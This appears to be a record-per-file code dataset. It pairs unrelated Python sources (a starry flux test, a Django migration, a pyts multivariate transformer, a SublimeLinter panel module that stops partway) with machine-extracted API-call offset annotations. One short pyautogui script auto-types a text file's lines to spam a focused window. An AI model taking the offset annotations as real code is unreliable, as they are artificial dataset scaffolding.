] | [((46, 74), 'dace.symbol', 'dc.symbol', (['s'], {'dtype': 'dc.int64'}), '(s, dtype=dc.int64)\n', (55, 74), True, 'import dace as dc\n'), ((146, 180), 'numpy.ndarray', 'np.ndarray', (['(M,)'], {'dtype': 'np.float64'}), '((M,), dtype=np.float64)\n', (156, 180), True, 'import numpy as np\n'), ((302, 318), 'numpy.empty_like', 'np.empty_like', (['r'], {}), '(r)\n', (315, 318), True, 'import numpy as np\n')] |
import starry
import numpy as np
import matplotlib.pyplot as plt
import pytest
@pytest.mark.parametrize("ydeg,nw", [[0, None], [0, 10], [1, None], [1, 10]])
def test_system(ydeg, nw):
    """System flux must equal the primary map's flux evaluated at the
    planet's position scaled by the stellar radius (scalar and nw=10)."""
    # Oblate map
    map = starry.Map(udeg=2, ydeg=ydeg, oblate=True, nw=nw)
    map[1] = 0.5
    map[2] = 0.25
    map.omega = 0.5
    map.beta = 1.23
    map.tpole = 8000
    map.f = 1 - 2 / (map.omega ** 2 + 2)
    map.obl = 30
    # Compute system flux
    star = starry.Primary(map, r=1.5)
    # dark companion (amp=0) so only the primary contributes light
    planet = starry.Secondary(starry.Map(amp=0, nw=nw), porb=1.0, r=0.1, m=0)
    sys = starry.System(star, planet)
    t = np.linspace(-0.1, 0.1, 1000)
    flux_sys = sys.flux(t, integrated=True)
    # Compute map flux manually
    x, y, z = sys.position(t)
    # occultor coordinates normalized by the stellar radius
    xo = x[1] / star._r
    yo = y[1] / star._r
    flux_map = map.flux(xo=xo, yo=yo, ro=planet._r / star._r, integrated=True)
    # Check that they agree
    assert np.allclose(flux_map, flux_sys)
| [
"numpy.allclose",
"starry.Primary",
"starry.Map",
"starry.System",
"pytest.mark.parametrize",
"numpy.linspace"
] | [((82, 158), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ydeg,nw"""', '[[0, None], [0, 10], [1, None], [1, 10]]'], {}), "('ydeg,nw', [[0, None], [0, 10], [1, None], [1, 10]])\n", (105, 158), False, 'import pytest\n'), ((214, 263), 'starry.Map', 'starry.Map', ([], {'udeg': '(2)', 'ydeg': 'ydeg', 'oblate': '(True)', 'nw': 'nw'}), '(udeg=2, ydeg=ydeg, oblate=True, nw=nw)\n', (224, 263), False, 'import starry\n'), ((456, 482), 'starry.Primary', 'starry.Primary', (['map'], {'r': '(1.5)'}), '(map, r=1.5)\n', (470, 482), False, 'import starry\n'), ((571, 598), 'starry.System', 'starry.System', (['star', 'planet'], {}), '(star, planet)\n', (584, 598), False, 'import starry\n'), ((607, 635), 'numpy.linspace', 'np.linspace', (['(-0.1)', '(0.1)', '(1000)'], {}), '(-0.1, 0.1, 1000)\n', (618, 635), True, 'import numpy as np\n'), ((910, 941), 'numpy.allclose', 'np.allclose', (['flux_map', 'flux_sys'], {}), '(flux_map, flux_sys)\n', (921, 941), True, 'import numpy as np\n'), ((513, 537), 'starry.Map', 'starry.Map', ([], {'amp': '(0)', 'nw': 'nw'}), '(amp=0, nw=nw)\n', (523, 537), False, 'import starry\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 15 19:41:48 2021
@author: Traftmine
"""
import time
import pyautogui
START = time.time()
time.sleep(5)  # grace period to focus the target window
# Use a context manager so the script file is closed even if pyautogui
# raises mid-loop (the original leaked the handle on any error).
with open("beescript.txt", "r") as script_file:
    for word in script_file:
        pyautogui.typewrite(word)
        pyautogui.press("enter")
END = time.time()
print("The spam last for", round(END - START, 2), "secondes")
| [
"pyautogui.press",
"time.time",
"time.sleep",
"pyautogui.typewrite"
] | [((135, 146), 'time.time', 'time.time', ([], {}), '()\n', (144, 146), False, 'import time\n'), ((148, 161), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (158, 161), False, 'import time\n'), ((304, 315), 'time.time', 'time.time', ([], {}), '()\n', (313, 315), False, 'import time\n'), ((225, 250), 'pyautogui.typewrite', 'pyautogui.typewrite', (['word'], {}), '(word)\n', (244, 250), False, 'import pyautogui\n'), ((256, 280), 'pyautogui.press', 'pyautogui.press', (['"""enter"""'], {}), "('enter')\n", (271, 280), False, 'import pyautogui\n')] |
# Generated by Django 2.2.26 on 2022-02-25 16:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``Listerole`` model and a ``photo`` URL field to
    ``utilisateurs`` (app ``home``).

    NOTE: do not edit the operations of an applied migration.
    """

    dependencies = [
        ("home", "0002_listecategorie_utilisateurs"),
    ]

    operations = [
        migrations.CreateModel(
            name="Listerole",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("nom", models.CharField(max_length=16)),
            ],
        ),
        migrations.AddField(
            model_name="utilisateurs",
            name="photo",
            # optional profile picture URL
            field=models.URLField(blank=True, null=True),
        ),
    ]
| [
"django.db.models.URLField",
"django.db.models.AutoField",
"django.db.models.CharField"
] | [((806, 844), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (821, 844), False, 'from django.db import migrations, models\n'), ((381, 474), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (397, 474), False, 'from django.db import migrations, models\n'), ((634, 665), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(16)'}), '(max_length=16)\n', (650, 665), False, 'from django.db import migrations, models\n')] |
from django.contrib import admin
# Register your models here.
from .models import Organizer
# Expose the Organizer model in the Django admin with default options.
admin.site.register(Organizer)
"django.contrib.admin.site.register"
] | [((93, 123), 'django.contrib.admin.site.register', 'admin.site.register', (['Organizer'], {}), '(Organizer)\n', (112, 123), False, 'from django.contrib import admin\n')] |
"""Utility class for multivariate time series transformation."""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
from scipy.sparse import csr_matrix, hstack
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.utils.validation import check_is_fitted
from ..utils import check_3d_array
class MultivariateTransformer(BaseEstimator, TransformerMixin):
    r"""Transformer for multivariate time series.

    It provides a convenient class to transform multivariate time series with
    transformers that can only deal with univariate time series.

    Parameters
    ----------
    estimator : estimator object or list thereof
        Transformer. If one estimator is provided, it is cloned and each clone
        transforms one feature. If a list of estimators is provided, each
        estimator transforms one feature.

    flatten : bool (default = True)
        Affect shape of transform output. If True, ``transform``
        returns an array with shape (n_samples, \*). If False, the output of
        ``transform`` from each estimator must have the same shape and
        ``transform`` returns an array with shape (n_samples, n_features, \*).
        Ignored if the transformers return sparse matrices.

    Attributes
    ----------
    estimators_ : list of estimator objects
        The collection of fitted transformers.

    Examples
    --------
    >>> from pyts.datasets import load_basic_motions
    >>> from pyts.multivariate.transformation import MultivariateTransformer
    >>> from pyts.image import GramianAngularField
    >>> X, _, _, _ = load_basic_motions(return_X_y=True)
    >>> transformer = MultivariateTransformer(GramianAngularField(),
    ...                                       flatten=False)
    >>> X_new = transformer.fit_transform(X)
    >>> X_new.shape
    (40, 6, 100, 100)

    """
    def __init__(self, estimator, flatten=True):
        self.estimator = estimator
        self.flatten = flatten
    def fit(self, X, y=None):
        """Fit one transformer per feature.

        Parameters
        ----------
        X : array-like, shape = (n_samples, n_features, n_timestamps)
            Multivariate time series.

        y : None or array-like, shape = (n_samples,) (default = None)
            Class labels.

        Returns
        -------
        self : object

        """
        X = check_3d_array(X)
        _, n_features, _ = X.shape
        self._check_params(n_features)
        # fit each per-feature transformer on its own univariate slice
        for i, transformer in enumerate(self.estimators_):
            transformer.fit(X[:, i, :], y)
        return self
    def transform(self, X):
        r"""Apply transform to each feature.

        Parameters
        ----------
        X : array-like, shape = (n_samples, n_features, n_timestamps)
            Multivariate time series.

        Returns
        -------
        X_new : array, shape = (n_samples, *) or (n_samples, n_features, *)
            Transformed time series.

        """
        X = check_3d_array(X)
        n_samples, _, _ = X.shape
        check_is_fitted(self, 'estimators_')
        # transform each feature with its own fitted estimator
        X_transformed = [transformer.transform(X[:, i, :])
                         for i, transformer in enumerate(self.estimators_)]
        all_sparse = np.all([isinstance(X_transformed_i, csr_matrix)
                            for X_transformed_i in X_transformed])
        if all_sparse:
            # sparse outputs are always stacked horizontally (self.flatten
            # is ignored, as documented on the class)
            X_new = hstack(X_transformed)
        else:
            X_new = [self._convert_to_array(X_transformed_i)
                     for X_transformed_i in X_transformed]
            ndims = [X_new_i.ndim for X_new_i in X_new]
            shapes = [X_new_i.shape for X_new_i in X_new]
            # keep the (n_samples, n_features, *) layout only when every
            # estimator produced the same output shape
            one_dim = (np.unique(ndims).size == 1)
            if one_dim:
                one_shape = np.unique(shapes, axis=0).shape[0] == 1
            else:
                one_shape = False
            if (not one_shape) or self.flatten:
                X_new = [X_new_i.reshape(n_samples, -1) for X_new_i in X_new]
                X_new = np.concatenate(X_new, axis=1)
            else:
                X_new = np.asarray(X_new)
                # move the feature axis after the sample axis
                axes = [1, 0] + [i for i in range(2, X_new.ndim)]
                X_new = np.transpose(X_new, axes=axes)
        return X_new
    def _check_params(self, n_features):
        """Check parameters."""
        transformer = (isinstance(self.estimator, BaseEstimator)
                       and hasattr(self.estimator, 'transform'))
        if transformer:
            # a single transformer: clone it once per feature
            self.estimators_ = [clone(self.estimator)
                                for _ in range(n_features)]
        elif isinstance(self.estimator, list):
            if len(self.estimator) != n_features:
                raise ValueError(
                    "If 'estimator' is a list, its length must be equal to "
                    "the number of features ({0} != {1})"
                    .format(len(self.estimator), n_features)
                )
            for i, estimator in enumerate(self.estimator):
                if not (isinstance(estimator, BaseEstimator)
                        and hasattr(estimator, 'transform')):
                    raise ValueError("Estimator {} must be a transformer."
                                     .format(i))
            # a list of transformers: used as-is, one per feature
            self.estimators_ = self.estimator
        else:
            raise TypeError(
                "'estimator' must be a transformer that inherits from "
                "sklearn.base.BaseEstimator or a list thereof.")
    @staticmethod
    def _convert_to_array(X):
        """Convert the input data to an array if necessary."""
        if isinstance(X, csr_matrix):
            # densify a sparse matrix (.A is shorthand for .toarray())
            return X.A
        elif isinstance(X, np.ndarray):
            return X
        else:
            raise ValueError('Unexpected type for X: {}.'
                             .format(type(X).__name__))
| [
"sklearn.utils.validation.check_is_fitted",
"numpy.unique",
"sklearn.base.clone",
"numpy.asarray",
"scipy.sparse.hstack",
"numpy.concatenate",
"numpy.transpose"
] | [((3024, 3060), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self', '"""estimators_"""'], {}), "(self, 'estimators_')\n", (3039, 3060), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((3377, 3398), 'scipy.sparse.hstack', 'hstack', (['X_transformed'], {}), '(X_transformed)\n', (3383, 3398), False, 'from scipy.sparse import csr_matrix, hstack\n'), ((3992, 4021), 'numpy.concatenate', 'np.concatenate', (['X_new'], {'axis': '(1)'}), '(X_new, axis=1)\n', (4006, 4021), True, 'import numpy as np\n'), ((4064, 4081), 'numpy.asarray', 'np.asarray', (['X_new'], {}), '(X_new)\n', (4074, 4081), True, 'import numpy as np\n'), ((4172, 4202), 'numpy.transpose', 'np.transpose', (['X_new'], {'axes': 'axes'}), '(X_new, axes=axes)\n', (4184, 4202), True, 'import numpy as np\n'), ((4484, 4505), 'sklearn.base.clone', 'clone', (['self.estimator'], {}), '(self.estimator)\n', (4489, 4505), False, 'from sklearn.base import BaseEstimator, TransformerMixin, clone\n'), ((3670, 3686), 'numpy.unique', 'np.unique', (['ndims'], {}), '(ndims)\n', (3679, 3686), True, 'import numpy as np\n'), ((3750, 3775), 'numpy.unique', 'np.unique', (['shapes'], {'axis': '(0)'}), '(shapes, axis=0)\n', (3759, 3775), True, 'import numpy as np\n')] |
from functools import partial
from itertools import chain
import os
import sublime
import sublime_plugin
import textwrap
from .lint import elect, events, persist, util
if False:
from typing import (
Any, Dict, Iterable, List, Optional, Set, Tuple,
Union
)
from mypy_extensions import TypedDict
from .lint.persist import LintError
State_ = TypedDict('State_', {
'active_view': Optional[sublime.View],
'cursor': int,
'panel_opened_automatically': Set[sublime.WindowId]
})
bid = sublime.BufferId
ErrorsByBid = Dict[bid, List[LintError]]
PANEL_NAME = "SublimeLinter"
OUTPUT_PANEL = "output." + PANEL_NAME
# Module-wide UI state shared by the event handlers below.
State = {
    'active_view': None,
    'cursor': -1,
    'panel_opened_automatically': set()
}  # type: State_
def plugin_loaded():
    """Record the initially active view and make sure the panel exists."""
    window = sublime.active_window()
    State.update({'active_view': window.active_view()})
    ensure_panel(window)
def plugin_unloaded():
    """Detach event handlers and drop the output panel from every window."""
    events.off(on_lint_result)
    events.off(on_updated_error_positions)
    for win in sublime.windows():
        win.destroy_output_panel(PANEL_NAME)
@events.on(events.LINT_RESULT)
def on_lint_result(buffer_id, reason=None, **kwargs):
    """Refresh the panel in every window showing this buffer; maybe toggle it."""
    auto_toggle = reason in ('on_save', 'on_user_request')
    for window in sublime.windows():
        if buffer_id not in buffer_ids_per_window(window):
            continue
        if panel_is_active(window):
            fill_panel(window)
        if auto_toggle:
            toggle_panel_if_errors(window, buffer_id)
@events.on('updated_error_positions')
def on_updated_error_positions(view, **kwargs):
    """Re-render the panel when error positions move in a tracked buffer."""
    window = view.window()
    bid = view.buffer_id()
    if panel_is_active(window) and bid in buffer_ids_per_window(window):
        fill_panel(window)
class UpdateState(sublime_plugin.EventListener):
    """Keeps the module-level ``State`` in sync with the active view and
    cursor, and refreshes/toggles the output panel on relevant events."""
    def on_activated_async(self, active_view):
        window = active_view.window()
        # Sometimes a view is activated and then destructed before we get here
        # and then it doesn't have a window anymore
        if not window or active_view.settings().get('is_widget'):
            return
        State.update({
            'active_view': active_view,
            'cursor': get_current_pos(active_view)
        })
        ensure_panel(window)
        # only track the viewport while our panel is actually visible
        if panel_is_active(window):
            update_panel_selection(**State)
            start_viewport_poller()
        else:
            stop_viewport_poller()
    def on_selection_modified_async(self, view):
        active_view = State['active_view']
        # Do not race between `plugin_loaded` and this event handler
        if active_view is None:
            return
        if view.buffer_id() != active_view.buffer_id():
            return
        cursor = get_current_pos(active_view)
        # skip redundant work when the cursor has not actually moved
        if cursor != State['cursor']:
            State.update({
                'cursor': cursor
            })
            if panel_is_active(active_view.window()):
                update_panel_selection(**State)
    def on_pre_close(self, view):
        window = view.window()
        # If the user closes the window and not *just* a view, the view is
        # already detached, hence we check.
        if window and panel_is_active(window):
            sublime.set_timeout_async(lambda: fill_panel(window))
    @util.distinct_until_buffer_changed
    def on_post_save_async(self, view):
        # type: (sublime.View) -> None
        # In background mode most of the time the errors are already up-to-date
        # on save, so we (maybe) show the panel immediately.
        if view_gets_linted_on_modified_event(view):
            toggle_panel_if_errors(view.window(), view.buffer_id())
    def on_post_window_command(self, window, command_name, args):
        # track manual hide/show of our panel to mirror it into State
        if command_name == 'hide_panel':
            State['panel_opened_automatically'].discard(window.id())
            stop_viewport_poller()
            return
        if command_name == 'show_panel':
            if args.get('panel') == OUTPUT_PANEL:
                fill_panel(window)
                # Apply focus fix to ensure `next_result` is bound to our panel.
                active_group = window.active_group()
                active_view = window.active_view()
                panel = get_panel(window)
                window.focus_view(panel)
                window.focus_group(active_group)
                window.focus_view(active_view)
                sublime.set_timeout(start_viewport_poller)
            else:
                # some other panel took over: stop polling ours
                stop_viewport_poller()
def view_gets_linted_on_modified_event(view):
    # type: (sublime.View) -> bool
    """Return True if at least one linter runs for this view on modification."""
    for _linter in elect.runnable_linters_for_view(view, 'on_modified'):
        return True
    return False
def toggle_panel_if_errors(window, bid):
    """Toggle the panel if the view or window has problems, depending on settings."""
    if window is None:
        return

    show_panel_on_save = persist.settings.get('show_panel_on_save')
    if show_panel_on_save == 'never':
        return

    errors_by_bid = get_window_errors(window, persist.errors)
    # In 'window' mode any error anywhere in the window counts; otherwise
    # only errors of the just-saved buffer (`bid`) are relevant.
    has_relevant_errors = (
        show_panel_on_save == 'window' and errors_by_bid or
        bid in errors_by_bid)

    if not panel_is_active(window) and has_relevant_errors:
        window.run_command("show_panel", {"panel": OUTPUT_PANEL})
        # Remember that *we* opened it so we may auto-close it again below.
        State['panel_opened_automatically'].add(window.id())

    elif (
        panel_is_active(window) and
        not has_relevant_errors and
        window.id() in State['panel_opened_automatically']
    ):
        window.run_command("hide_panel", {"panel": OUTPUT_PANEL})
class SublimeLinterPanelToggleCommand(sublime_plugin.WindowCommand):
    """Toggle the SublimeLinter output panel of the current window."""

    def run(self):
        # Hide when visible, show when hidden.
        command = "hide_panel" if panel_is_active(self.window) else "show_panel"
        self.window.run_command(command, {"panel": OUTPUT_PANEL})
def get_current_pos(view):
    # type: (sublime.View) -> int
    """Return the buffer position of the first cursor, or -1 when there is none."""
    for region in view.sel():
        return region.begin()
    return -1
def panel_is_active(window):
    # type: (sublime.Window) -> bool
    """Check whether our output panel is the window's currently visible panel.

    A falsy `window` (e.g. None for a detached view) counts as "not active".
    """
    if not window:
        return False
    # `if x == y: return True else: return False` collapsed to the
    # equivalent boolean expression.
    return window.active_panel() == OUTPUT_PANEL
def ensure_panel(window):
    # type: (sublime.Window) -> Optional[sublime.View]
    """Return the existing output panel, creating it first if necessary."""
    panel = get_panel(window)
    if panel:
        return panel
    return create_panel(window)
def get_panel(window):
    # type: (sublime.Window) -> Optional[sublime.View]
    """Return our output panel if it has been created already, else None."""
    return window.find_output_panel(PANEL_NAME)
def create_panel(window):
    """Create and configure our output panel for `window`.

    Returns None when the syntax resource cannot be loaded (e.g. mid-upgrade).
    """
    panel = window.create_output_panel(PANEL_NAME)

    # Filename headers end in ':' and anchor the results that follow them.
    panel.settings().set("result_file_regex", r"^(.*):$")
    #       row:col             type    linter: code   message
    # where code is optional
    # r"^ +(\d+)(?::(\d+))? +\w+ +\w+:(?: \w+)? +(.*)$"
    panel.settings().set("result_line_regex", r"^ +(\d+)(?::(\d+))?.*")

    syntax_path = "Packages/SublimeLinter/panel/panel.sublime-syntax"
    try:  # Try the resource first, in case we're in the middle of an upgrade
        sublime.load_resource(syntax_path)
    except Exception:
        return
    panel.assign_syntax(syntax_path)

    # Call create_output_panel a second time after assigning the above
    # settings, so that it'll be picked up as a result buffer
    # see: Packages/Default/exec.py#L228-L230
    return window.create_output_panel(PANEL_NAME)
def draw(panel, content=None, errors_from_active_view=None, nearby_lines=None):
    # type: (sublime.View, str, List[LintError], Union[int, List[int]]) -> None
    """Update the panel's content and highlighting in one pass.

    `nearby_lines` selects the highlight mode: None clears all marks,
    a list of line numbers selects those lines, and a single int draws
    the position ("cursor") marker at that line instead.
    """
    # Fix: the default used to be a shared mutable `[]` (classic Python
    # pitfall); use a None sentinel and build a fresh list per call.
    if errors_from_active_view is None:
        errors_from_active_view = []

    if content is not None:
        update_panel_content(panel, content)

    if nearby_lines is None:
        mark_lines(panel, None)
        draw_position_marker(panel, None)
        scroll_into_view(panel, None, errors_from_active_view)
    elif isinstance(nearby_lines, list):
        mark_lines(panel, nearby_lines)
        draw_position_marker(panel, None)
        scroll_into_view(panel, nearby_lines, errors_from_active_view)
    else:
        mark_lines(panel, None)
        draw_position_marker(panel, nearby_lines)
        scroll_into_view(panel, [nearby_lines], errors_from_active_view)
def draw_on_main_thread(*args, **kwargs):
    """Schedule `draw` to run on Sublime's main (UI) thread."""
    sublime.set_timeout(partial(draw, *args, **kwargs))
def get_window_errors(window, errors_by_bid):
    # type: (sublime.Window, ErrorsByBid) -> ErrorsByBid
    """Collect errors of every buffer shown in `window`, sorted by position."""
    def sort_key(error):
        return (error["line"], error["start"], error["end"], error["linter"])

    rv = {}
    for bid in buffer_ids_per_window(window):
        errors = errors_by_bid.get(bid)
        # Buffers without (known) errors are left out entirely.
        if errors:
            rv[bid] = sorted(errors, key=sort_key)
    return rv
def buffer_ids_per_window(window):
    """Return the set of buffer ids of all views attached to `window`."""
    ids = set()
    for view in window.views():
        ids.add(view.buffer_id())
    return ids
def create_path_dict(window, bids):
    """Map buffer ids to short, panel-friendly paths.

    Returns `(rel_paths, base_dir)`: `rel_paths` maps each buffer id to a
    path relative to `base_dir` (the common parent of all real files);
    untitled buffers keep their `<untitled …>` placeholder name.
    """
    file_names_by_bid = get_filenames(window, bids)

    # Untitled placeholders must not influence the common parent.
    base_dir = get_common_parent([
        path
        for path in file_names_by_bid.values()
        if not path.startswith('<untitled')
    ])

    rel_paths = {
        bid: (
            os.path.relpath(abs_path, base_dir)
            if base_dir and not abs_path.startswith('<untitled')
            else abs_path
        )
        for bid, abs_path in file_names_by_bid.items()
    }

    return rel_paths, base_dir
def get_filenames(window, bids):
    """
    Return dict of buffer_id: file_name for all views in window.

    Assign a substitute name to untitled buffers: <untitled buffer_id>
    """
    rv = {}
    for view in window.views():
        bid = view.buffer_id()
        if bid not in bids:
            continue
        rv[bid] = view.file_name() or "<untitled {}>".format(bid)
    return rv
def get_common_parent(paths):
    """Get the common parent directory of multiple absolute file paths."""
    prefix = os.path.commonprefix(paths)
    # `commonprefix` is character based and may stop mid-component;
    # `dirname` trims that back to an actual directory.
    return os.path.dirname(prefix)
def format_header(f_path):
    """Render the filename line that precedes a file's error listing."""
    return str(f_path) + ":"
def format_error(error, widths):
    # type: (LintError, Dict[str, int]) -> List[str]
    """Format one error as a list of panel lines.

    The first line carries the position/type/linter/code columns padded
    according to `widths`; the message is wrapped at the viewport width
    with continuation lines aligned under the message start.
    """
    code_width = widths['code']
    code_tmpl = ":{{code:<{}}}".format(code_width)
    tmpl = (
        " {{LINE:>{line}}}:{{START:<{col}}} {{error_type:{error_type}}} "
        "{{linter:<{linter_name}}}{{CODE}} "
        .format(**widths)
    )

    if error['code']:
        code = code_tmpl.format(**error)
    else:
        # Blank-pad instead; the extra 1 stands in for the ':'.
        code = ' ' * (code_width + (1 if code_width else 0))

    info = tmpl.format(
        LINE=error["line"] + 1,
        START=error["start"] + 1,
        CODE=code,
        **error
    )
    wrapped = textwrap.wrap(
        error['msg'],
        width=widths['viewport'],
        initial_indent=" " * len(info),
        subsequent_indent=" " * len(info)
    )
    # The first wrapped line starts right after the info columns.
    wrapped[0] = info + wrapped[0].lstrip()
    return wrapped
def fill_panel(window, then=draw_on_main_thread):
    """Create the panel if it doesn't exist, then update its contents."""
    panel = ensure_panel(window)
    # If we're here and the user actually closed the window in the meantime,
    # we cannot create a panel anymore, and just pass.
    if not panel:
        return

    errors_by_bid = get_window_errors(window, persist.errors)
    fpath_by_bid, base_dir = create_path_dict(window, errors_by_bid.keys())

    settings = panel.settings()
    settings.set("result_base_dir", base_dir)

    # Column widths are computed over *all* errors so the table lines up:
    # per error a 5-tuple of string lengths, transposed via zip(*...),
    # reduced with max, and zipped back onto the column names.
    widths = dict(
        zip(
            ('line', 'col', 'error_type', 'linter_name', 'code'),
            map(
                max,
                zip(*[
                    (
                        len(str(error['line'] + 1)),
                        len(str(error['start'] + 1)),
                        len(error['error_type']),
                        len(error['linter']),
                        len(str(error['code'])),
                    )
                    for error in chain(*errors_by_bid.values())
                ])
            )
        )
    )  # type: Dict[str, int]
    widths['viewport'] = int(panel.viewport_extent()[0] // panel.em_width() - 1)

    to_render = []
    # Render files sorted by their (relative) path.
    for fpath, errors in sorted(
        (fpath_by_bid[bid], errors) for bid, errors in errors_by_bid.items()
    ):
        to_render.append(format_header(fpath))

        for error in errors:
            lines = format_error(error, widths)
            to_render.extend(lines)
            # Remember which panel lines this error occupies; consumed by
            # `update_panel_selection` and the viewport renderer.
            error["panel_line"] = (len(to_render) - len(lines), len(to_render) - 1)

        # Insert empty line between files
        to_render.append("")

    content = '\n'.join(to_render)
    draw_info = {
        'panel': panel,
        'content': content
    }

    if State['active_view'].window() == window:
        update_panel_selection(draw_info=draw_info, then=then, **State)
    else:
        then(**draw_info)
def update_panel_selection(active_view, cursor, draw_info=None, then=draw, **kwargs):
    """Alter panel highlighting according to the current cursor position."""
    if draw_info is None:
        draw_info = {}

    panel = get_panel(active_view.window())
    if not panel:
        return

    if cursor == -1:
        return

    bid = active_view.buffer_id()

    try:
        # Rarely, and if so only on hot-reload, `update_panel_selection` runs
        # before `fill_panel`, thus 'panel_line' has not been set.
        all_errors = sorted(persist.errors[bid], key=lambda e: e['panel_line'])
    except KeyError:
        all_errors = []

    draw_info.update(
        panel=panel,
        errors_from_active_view=all_errors
    )  # type: Dict[str, Any]

    row, _ = active_view.rowcol(cursor)
    # Pair every error with its "distance" to the cursor: primarily the
    # line delta, secondarily the character delta to the closer region end.
    errors_with_position = (
        (
            error,
            (
                abs(error['line'] - row),
                min(
                    abs(error['region'].begin() - cursor),
                    abs(error['region'].end() - cursor)
                )
            )
        )
        for error in all_errors
    )  # type: Iterable[Tuple[LintError, Tuple[int, int]]]

    SNAP = (3, )  # [lines]
    nearest_error = None
    try:
        # Tuple comparison: a position qualifies when its line delta is
        # strictly below SNAP[0]; `min` then picks the closest of those.
        nearest_error, _ = min(
            (
                e_p
                for e_p in errors_with_position
                if e_p[1] < SNAP
            ),
            key=lambda e_p: e_p[1]
        )
    except ValueError:
        # `min` raised on an empty sequence: no error close enough.
        nearest_error = None

    if nearest_error:
        # Highlight every error whose region is covered by the nearest one.
        panel_lines = [
            error['panel_line'][0]
            for error in all_errors
            if nearest_error['region'].contains(error['region'])
        ]
        draw_info.update(nearby_lines=panel_lines)
    elif all_errors:
        # No error nearby: point *between* the surrounding errors instead,
        # right before the next error after the cursor (or after the last).
        try:
            next_error = next(
                error
                for error in all_errors
                if error['region'].begin() > cursor
            )
        except StopIteration:
            last_error = all_errors[-1]
            panel_line = last_error['panel_line'][1] + 1
        else:
            panel_line = next_error['panel_line'][0]

        draw_info.update(nearby_lines=panel_line)

    then(**draw_info)
# Visual side-effects #
def update_panel_content(panel, text):
    """Replace the panel's text, substituting a placeholder when empty."""
    content = text or "No lint results."
    panel.run_command('_sublime_linter_update_panel_content', {'text': content})
class _sublime_linter_update_panel_content(sublime_plugin.TextCommand):
    def run(self, edit, text):
        """Replace a view's text entirely and try to hold the viewport stable."""
        view = self.view
        # Remember the horizontal scroll position; replacing the whole
        # content resets it.
        x, _ = view.viewport_position()
        view.set_read_only(False)
        view.replace(edit, sublime.Region(0, view.size()), text)
        view.set_read_only(True)
        # We cannot measure the `viewport_position` until right after this
        # command actually finished. So we defer to the next tick/micro-task
        # using `set_timeout`.
        sublime.set_timeout(
            lambda: view.run_command('_sublime_linter_pin_x_axis', {'x': x})
        )
class _sublime_linter_pin_x_axis(sublime_plugin.TextCommand):
    """Restore the horizontal scroll position after a content update."""

    def run(self, edit, x):
        current_x, current_y = self.view.viewport_position()
        if x != current_x:
            self.view.set_viewport_position((x, current_y), False)
# Scrolling tunables: keep this many lines of context around the target,
# and jump in steps of viewport_height // JUMP_COEFFICIENT.
INNER_MARGIN = 2  # [lines]
JUMP_COEFFICIENT = 3
def scroll_into_view(panel, wanted_lines, errors):
    # type: (sublime.View, Optional[List[int]], List[LintError]) -> None
    """Compute and then scroll the view so that `wanted_lines` appear.

    Basically an optimized, do-it-yourself version of `view.show()`. If
    possible shows the start of this file section (the filename) at the top
    of the viewport. Otherwise tries to not 'overscroll' so that errors from a
    possible next file are essentially hidden. Inbetween tries to scroll as
    little as possible.
    """
    if not errors or not wanted_lines:
        return

    # We would like to use just `view.visible_region()` but that doesn't count
    # lines past the content. E.g. if you're at the eof it - for our purpose
    # wrongly - tells you that the visible region is only 2 lines height.
    # So we compute the values basically using `viewport_extent()`. This
    # unfortunately leads to rounding errors bc we must convert from pixels
    # to lines. See below.
    _, vy = panel.viewport_position()
    vtop = panel.rowcol(panel.layout_to_text((0.0, vy)))[0]
    vheight = int(panel.viewport_extent()[1] // panel.line_height())
    vbottom = vtop + vheight

    # Before the first error comes the filename
    ftop = errors[0]['panel_line'][0] - 1
    # After the last error comes the empty line
    fbottom = errors[-1]['panel_line'][1] + 1
    fheight = fbottom - ftop + 1

    # Whole file section fits: pin its header to the top and we're done.
    if fheight <= vheight:
        scroll_to_line(panel, ftop, animate=False)
        return

    wtop, wbottom = wanted_lines[0], wanted_lines[-1]
    out_of_bounds = False
    jump_position = int(vheight // JUMP_COEFFICIENT)

    # First clamp the viewport into the file section.
    if fbottom < vbottom:
        out_of_bounds = True
        vtop = max(ftop, fbottom - vheight)
    elif ftop > vtop:
        out_of_bounds = True
        vtop = ftop

    if vtop + INNER_MARGIN < wbottom < vbottom - INNER_MARGIN:
        if not out_of_bounds:
            return  # Do nothing bc `vtop` likely has rounding errors
    elif wtop < vtop + INNER_MARGIN:
        vtop = max(ftop, wtop - jump_position)
    elif vbottom - INNER_MARGIN < wbottom:
        next_bottom = min(fbottom, wbottom + jump_position)
        vtop = max(ftop, next_bottom - vheight)

    scroll_to_line(panel, vtop, animate=not out_of_bounds)
def scroll_to_line(view, line, animate):
    """Scroll y-axis so that `line` appears at the top of the viewport."""
    layout_pos = view.text_to_layout(view.text_point(line, 0))
    y = layout_pos[1]
    view.run_command('_sublime_linter_scroll_y', {'y': y, 'animate': animate})
class _sublime_linter_scroll_y(sublime_plugin.TextCommand):
    """Set the viewport's y position while keeping x unchanged."""

    def run(self, edit, y, animate):
        current_x = self.view.viewport_position()[0]
        self.view.set_viewport_position((current_x, y), animate)
def mark_lines(panel, lines):
    # type: (sublime.View, Optional[List[int]]) -> None
    """Select/Highlight given lines; None clears the selection."""
    if lines is None:
        panel.sel().clear()
        return

    regions = []
    for line in lines:
        regions.append(panel.line(panel.text_point(line, 0)))

    panel.sel().clear()
    panel.sel().add_all(regions)
# Region key / color scope for the panel's position ("cursor") marker.
CURSOR_MARKER_KEY = 'SL.PanelMarker'
CURSOR_MARKER_SCOPE = 'region.yellowish.panel_cursor.sublime_linter'
def draw_position_marker(panel, line):
    # type: (sublime.View, Optional[int]) -> None
    """Draw a visual cursor 'below' given line.

